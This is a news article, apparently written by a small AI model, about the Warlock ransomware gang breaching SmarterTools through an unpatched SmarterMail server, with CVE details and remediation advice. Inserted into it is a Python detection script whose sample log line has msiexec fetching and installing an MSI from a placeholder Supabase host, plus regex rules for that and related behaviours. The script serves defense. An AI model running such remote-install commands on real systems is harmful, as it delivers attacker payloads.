

Ethical Hacking News

Unpatched SmarterMail Server Exposes SmarterTools to Devastating Warlock Ransomware Attack



SmarterTools recently suffered a devastating cyber attack at the hands of the notorious Warlock ransomware gang. The attackers exploited an unpatched SmarterMail server to gain access to the company's network and cause significant damage. In light of this attack, users are advised to upgrade to the latest version of SmarterMail (Build 9526) immediately for optimal protection.

  • SmarterTools was targeted by the Warlock ransomware gang in a devastating cyber attack on January 29, 2026.
  • About 30 servers/VMs with SmarterMail installed were affected by the breach, but other services and business applications remained unaffected.
  • The attackers exploited a SmarterMail server that was not being updated, gaining initial access to SmarterTools' network.
  • Multiple vulnerabilities in SmarterMail were identified as being exploited by the Warlock gang, including CVE-2025-52691 and CVE-2026-24423.
  • SmarterTools has since patched several critical vulnerabilities and advised users to upgrade to the latest version of SmarterMail for optimal protection.



    SmarterTools, a company that provides email management solutions, recently suffered a devastating cyber attack at the hands of the notorious Warlock ransomware gang. The attack occurred on January 29, 2026, when attackers compromised an unpatched SmarterMail server. The compromise gave them access to SmarterTools' network and allowed them to cause significant damage.

    According to Derek Curtis, SmarterTools' Chief Commercial Officer, approximately 30 servers/VMs with SmarterMail installed throughout their network were affected by the breach. The company emphasized, however, that the attack did not affect its website, shopping cart, My Account portal, or several other services, and that no business applications or account data were involved.

    The attackers targeted a mail server that had been set up by an employee and was not being updated. The Warlock group exploited this unpatched server to gain initial access to SmarterTools' network. After gaining entry, the attackers waited a couple of days before taking control of the Active Directory server and creating new users. They then dropped additional payloads, such as Velociraptor and the locker used to encrypt files.

    Researchers have identified multiple vulnerabilities in SmarterMail that were exploited by the Warlock gang, including CVE-2025-52691 (CVSS score: 10.0), CVE-2026-23760, and CVE-2026-24423 (CVSS scores: 9.3). These vulnerabilities allowed attackers to bypass authentication and reset administrator passwords, among other things.

    Security expert Alexa Feminella of ReliaQuest stated that the attackers used Supabase, a legitimate cloud-based backend platform, to download a malicious MSI installer ("v4.msi") that installed Velociraptor. This allowed them to maintain access and set the stage for ransomware.

    "The pace of weaponization is consistent with ransomware operators rapidly analyzing vendor fixes and developing working tradecraft shortly after release," Feminella added.
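Detection logic for the post-compromise behaviours described above (new accounts being created, an MSI fetched from a remote host, a Velociraptor service appearing), as an added example that is not code from SmarterTools, ReliaQuest or this article. The event records are constructed, and the field names, host names and 7-day correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records, NOT logs from the incident. Field names are
# assumptions modelled on Windows events 4688 (process creation),
# 4720 (user account created) and 7045 (service installed).
EVENTS = [
    {"ts": "2026-01-05T10:00:00", "host": "WS12", "id": 4688,
     "text": r"msiexec.exe /i C:\Installers\agent.msi /qn"},
    {"ts": "2026-01-06T08:30:00", "host": "DC01", "id": 4720,
     "text": "TargetUserName=svc_backup2 SubjectUserName=Administrator"},
    {"ts": "2026-01-06T08:41:00", "host": "MAIL07", "id": 4688,
     "text": "msiexec.exe /q /i https://placeholder.supabase.co/files/v4.msi"},
    {"ts": "2026-01-06T08:42:00", "host": "MAIL07", "id": 7045,
     "text": r"ServiceName=Velociraptor ImagePath=C:\Tools\Velociraptor.exe"},
]

# msiexec pointed at an http(s) URL; group 2 captures the hosting domain.
REMOTE_MSI = re.compile(r"msiexec(\.exe)?\b.*?https?://(\S+?)/\S*\.msi\b", re.I)
NEEDED = {"remote-msi", "new-account", "velociraptor-service"}

def classify(event):
    """Return a finding label for one event, or None if it is not of interest."""
    if event["id"] == 4688 and (m := REMOTE_MSI.search(event["text"])):
        return f"remote-msi:{m.group(2).lower()}"
    if event["id"] == 4720:
        return "new-account"
    if event["id"] == 7045 and "velociraptor" in event["text"].lower():
        return "velociraptor-service"
    return None

def findings(events):
    """Time-ordered (timestamp, host, label) tuples for events that matched a rule."""
    hits = [(datetime.fromisoformat(e["ts"]), e["host"], classify(e)) for e in events]
    return sorted(h for h in hits if h[2])

def chain_alert(events, window=timedelta(days=7)):
    """True when all three behaviours were seen, with the latest sighting of
    each falling inside `window` (7 days is an assumed tuning value)."""
    latest = {}
    for ts, _host, label in findings(events):
        latest[label.split(":")[0]] = ts
    if not NEEDED <= latest.keys():
        return False
    return max(latest.values()) - min(latest.values()) <= window

if __name__ == "__main__":
    for ts, host, label in findings(EVENTS):
        print(ts.isoformat(), host, label)
    print("chain alert:", chain_alert(EVENTS))
```

Where an organization deploys Velociraptor itself, the service rule needs an allowlist of the hosts expected to run it.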

    In light of this attack, SmarterTools has issued a warning to its users, advising them to upgrade to the latest version (Build 9526) immediately for optimal protection. The company also recommended that users isolate their mail servers to block lateral movement attempts used to deploy ransomware.

    SmarterMail has subsequently patched several critical vulnerabilities with CVSS scores of 9.3 or higher, including CVE-2026-23760 and CVE-2026-24423. These patches have been released in build 9511.

    The attack on SmarterTools serves as a reminder for companies to prioritize patching their software, especially when it comes to email management solutions like SmarterMail. Unpatched vulnerabilities can lead to devastating cyber attacks that put businesses at risk of financial loss and reputational damage.

    In conclusion, the Warlock ransomware gang has shown its ability to exploit unpatched SmarterMail servers to gain access to networks and cause significant damage. SmarterTools has since released patches for several critical vulnerabilities with CVSS scores of 9.3 or higher. Users are advised to upgrade to the latest version of SmarterMail (Build 9526) immediately for optimal protection.




  • Published: Tue Feb 10 05:40:16 2026 by llama3.2 3B Q4_K_M












